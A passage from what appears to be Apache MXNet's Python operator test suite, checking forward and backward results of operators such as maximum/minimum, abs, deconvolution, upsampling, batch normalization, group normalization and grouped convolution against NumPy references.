npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
s = shape[1],
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 8, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
dtype = x.dtype
dshape = x.shape
assert len(dshape) == 4
acc_type = acc_types[str(dtype)]
new_shape = (dshape[0], num_groups, int(dshape[1] / num_groups), dshape[2], dshape[3])
new_moments_shape = (dshape[0], num_groups, 1, 1, 1)
data = x.reshape(new_shape)
mean = np.mean(data, axis=(2, 3, 4), keepdims=False, dtype=acc_type).astype(dtype)
std = np.sqrt(np.var(data, axis=(2, 3, 4), dtype=acc_type, keepdims=False).astype(dtype) + eps)
x_hat = (data - mean.reshape(new_moments_shape)) / std.reshape(new_moments_shape)
return x_hat, mean, std
def np_groupnorm(data, gamma, beta, num_groups, eps):
new_param_shape = (1, dshape[1], 1, 1)
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
out = x_hat.reshape(dshape) * gamma.reshape(new_param_shape) + beta.reshape(new_param_shape)
return out, mean, std
def np_groupnorm_grad(ograd, data, gamma, beta, mean, std, num_groups, eps):
x_hat, mean, std = x_hat_helper(data, num_groups, eps)
new_shape = x_hat.shape
dshape = data.shape
dtype = data.dtype
new_moments_shape = (new_shape[0], num_groups, 1, 1, 1)
new_param_shape = (1, dshape[1], 1, 1)
acc_type = acc_types[str(dtype)]
ograd = ograd.reshape(new_shape)
data = data.reshape(new_shape)
gamma = gamma.reshape(new_param_shape)
beta = beta.reshape(new_param_shape)
mean = mean.reshape(new_moments_shape)
std = std.reshape(new_moments_shape)
beta_grad = np.sum(ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
gamma_grad = np.sum(x_hat * ograd, axis=(0, 3, 4), dtype=acc_type, keepdims=False).astype(dtype).flatten()
x_hat_grad = ograd * gamma.reshape(1, num_groups, dshape[1] // num_groups, 1, 1)
ograd_mult = x_hat_grad / std
red_out = np.mean(ograd_mult, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = ograd_mult - red_out
red_out = np.mean(ograd_mult * x_hat, axis=(2, 3, 4), dtype=acc_type, keepdims=True).astype(dtype)
data_grad = data_grad - x_hat * red_out
return data_grad.reshape(dshape), gamma_grad, beta_grad
batch_size = random.randint(1, 8)
num_groups = random.randint(2, 3)
num_channels = random.randint(2, 3) * num_groups
height = random.randint(1, 5)
width = random.randint(1, 5)
dshape = (batch_size, num_channels, height, width)
param_shape = (num_channels,)
temp_shape = (batch_size, num_groups, int(num_channels / num_groups), height, width)
np_data = np.random.uniform(0.2, 1.0, dshape)
np_gamma = np.random.uniform(-1.0, 1.0, param_shape)
np_beta = np.random.uniform(-1.0, 1.0, param_shape)
data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-4, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-4, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
assert_allclose(arr1, arr2, rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 8]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
